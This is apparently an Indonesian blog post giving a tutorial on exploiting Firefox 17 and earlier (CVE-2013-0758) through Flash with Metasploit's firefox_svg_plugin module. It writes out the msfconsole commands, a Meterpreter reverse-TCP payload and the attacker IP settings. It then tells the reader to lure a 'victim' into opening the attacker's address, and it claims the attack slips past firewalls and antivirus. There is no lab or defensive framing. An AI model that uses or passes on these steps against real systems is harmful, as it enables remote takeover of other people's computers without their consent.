kali ini saya akan berbagi tutorial tentang bagaimana mengexploitasi OS windows,Mac OSX & linux menggunakan metasploit
exploit ini berlaku pada firefox pada versi 17 dan sebelum nya dengan catatan sudah terinstal flash ,, mengapa ?
karena di sini flash akan di gunakan sebagai triger untuk dapat mengirim payload ke OS target ,
dalam exploit ini tak ada memory corupption hanya mengcloning flash ke file SVG dengan element (CVE-2013-0758) secara anonymous dan dapat membypass firewall mau pun antivir,,
dari situ flash akan mengarahakan kedalam payload kita
exploit target :
Windows PC atau Mac OSx pc atau Linux Pc
kalo saya tested di
Os target Windows
dan saya menggunakan kali linux (yang sudah terinstall Metasploit)
pertama - tama buka metasploit di terminal
root@kali ~# msfconsole
setelah itu lalu gunakan exploit kita tadi
tulis :
use exploit/multi/browser/firefox_svg_plugin
nah setting attacker & victim nya
msf exploit (firefox_svg_plugin)>set payload windows/meterpreter/reverse_tcp
msf exploit (firefox_svg_plugin)>set lhost 192.168.1.4 (Ip adressmu)
msf exploit (firefox_svg_plugin)>set srvhost 192.168.1.167 (dan disini juga isikan ip adress mu)
msf exploit (firefox_svg_plugin)>set uripath /
msf exploit (firefox_svg_plugin)>exploit
sementara exploit sudah di jalan kan maka sekrng saat nya menjebak victim agar dapat mengakses ip yg nanti nya akan menjadi celah exploit agar kita dapat masuk :)
dan jika berhasil akan seperti ini
SS
senang bisa berbagi
semoga bermanfaat yah
0 comments:
Post a Comment